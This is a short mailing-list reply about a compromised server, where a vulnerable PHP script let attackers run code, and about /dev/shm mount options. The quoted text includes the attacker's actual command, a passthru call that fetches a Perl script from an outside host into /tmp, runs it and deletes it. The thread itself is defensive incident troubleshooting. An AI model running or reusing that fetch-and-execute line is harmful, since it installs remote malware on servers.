Re: ping22: can not kill this process
In article <[🔎] 91dd90da0801031518o767a5937je92550695aa66f4f@mail.gmail.com> you wrote:
> I found the issue, it is one of the php script allowing the
> remote script to run.
This is a typical Apache exploit where remote fileuploads are possible.
> passthru('cd /tmp;wget http://www.radiovirtual.org/bb.txt;perl
> bb.txt;rm -f bb.txt*');
> what kind applications are using /dev/shm? I googled
> around,seem not find much information.
> right now I mount i as rw,noexec,nosuid.
It is for example used to map shared memory. I am not sure, but I think
noexec and nodev is possible. However this does not solve your problem of a
insecure web app.
Gruss
Bernd
Reply to: